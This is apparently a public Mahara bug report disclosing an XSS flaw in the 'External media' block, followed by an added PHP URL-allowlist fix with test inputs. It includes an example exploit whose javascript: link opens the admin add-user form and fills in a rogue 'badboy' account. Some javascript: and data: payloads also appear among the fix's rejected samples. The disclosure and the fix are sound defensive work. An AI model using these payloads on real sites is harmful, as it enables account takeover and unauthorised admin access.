XSS exploit in 'External media' block
Bug #1968920 reported by Kristina Hoeppner
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Mahara | Fix Released | High | Gold |
20.10 | Fix Released | High | Unassigned |
21.04 | Fix Released | High | Unassigned |
21.10 | Fix Released | High | Unassigned |
22.04 | Fix Released | High | Gold |
Bug Description
When you put the following into the 'External media' block, you get an alert pop-up window.
<a class="
In contrast to text blocks where the 'javascript:alert' is stripped out, this is not the case in 'External media'.
It wasn't a problem when the class wasn't present, but with the class, a pop-up with the current domain is displayed.
CVE References
Changes:
- description: updated
- Changed in mahara: status: New → Confirmed; importance: Undecided → High
- no longer affects: mahara/20.10
- no longer affects: mahara/22.10
- information type: Private Security → Public Security
Example exploit:
<a class=" embedly- card" href="javascript: {var TestFenster = http:// window. open('. ./admin/ users/add. php','TestWindo w','width= 800,height= 800,left= 100,top= 50');function fill() {TestWindow. adduser. username. value=' badboy' ;TestWindow. adduser. firstname. value=' Bad';TestWindow .adduser. lastname. value=' Boy';http://<email address hidden> ';TestWindow. adduser. password. value=' Secret+ 12345';https:/ /t.co/f2YTjI3B9 B();}TestWindow. addEventListene r('load' ,fill); }">open the gate</a>
Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.
-------
Things to keep in mind:
- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http://', 'https://', and '://' blocktype/externalvideo/embed_services/embedly/embedservice.php#L61
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/
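The URL sanitisation the notes above call for, written as an added PHP example (this is not Mahara's code; the function names `safe_embed_url` and `embed_anchor`, the `ALLOWED_EMBED_SCHEMES` constant and the sample URLs are assumptions). It accepts only http, https and scheme-relative URLs and rejects everything else before the value is placed into the embedly anchor's `href`, which is the attribute the report's pop-up came through. Because it allows known-good schemes rather than stripping the string 'javascript:' (the approach the text blocks rely on), changes of case or stray control characters in the scheme are rejected as well; the output is also attribute-escaped so the URL cannot close the attribute.

```php
<?php
// Added example, not Mahara's code: allowlist check for an embed URL before it
// is placed into an <a class="embedly-card" href="..."> anchor.
declare(strict_types=1);

// Hypothetical constant: the only schemes an embed URL may carry.
const ALLOWED_EMBED_SCHEMES = ['http', 'https'];

/**
 * Returns a normalised absolute URL if $url is safe to embed, or null if not.
 * Only http and https (and scheme-relative //host/path, promoted to https) pass.
 */
function safe_embed_url(string $url): ?string {
    // Drop ASCII control characters and surrounding whitespace first; browsers
    // ignore them inside a scheme, so they must not be able to hide one.
    $url = trim((string) preg_replace('/[\x00-\x1F\x7F]/', '', $url));
    if ($url === '') {
        return null;
    }
    // Scheme-relative URLs (the "protocol free" case in the notes): pin to https.
    if (substr($url, 0, 2) === '//') {
        $url = 'https:' . $url;
    }
    // Anything that declares a scheme must be on the allowlist; this is the
    // branch that rejects javascript:, data:, vbscript: and friends.
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
        if (!in_array(strtolower($m[1]), ALLOWED_EMBED_SCHEMES, true)) {
            return null;
        }
    } else {
        // Bare "host/path" input gets an explicit https scheme.
        $url = 'https://' . $url;
    }
    // The result must still parse as an absolute URL with a host.
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    return $url;
}

/** Build the embedly anchor; href is validated and attribute-escaped. */
function embed_anchor(string $url, string $label): ?string {
    $safe = safe_embed_url($url);
    if ($safe === null) {
        return null;
    }
    return '<a class="embedly-card" href="'
        . htmlspecialchars($safe, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">'
        . htmlspecialchars($label, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</a>';
}

// Constructed sample inputs: the first three are accepted, the rest rejected.
$samples = [
    'https://www.youtube.com/watch?v=example',
    'http://vimeo.com/12345',
    '//example.org/video/1',
    'javascript:alert(document.domain)',
    "java\tscript:alert(1)",
    'JAVASCRIPT:alert(1)',
    'data:text/html;base64,PHNjcmlwdD4=',
];
foreach ($samples as $s) {
    $r = embed_anchor($s, 'open');
    echo str_pad(json_encode($s), 48) . ' => ' . ($r ?? 'REJECTED') . PHP_EOL;
}
```

Run it with `php` on the command line; the three http/https/scheme-relative inputs print a full anchor and the remaining four print `REJECTED`. The check belongs wherever the embed service builds the anchor from user input, which is the spot the notes above point at in embedservice.php.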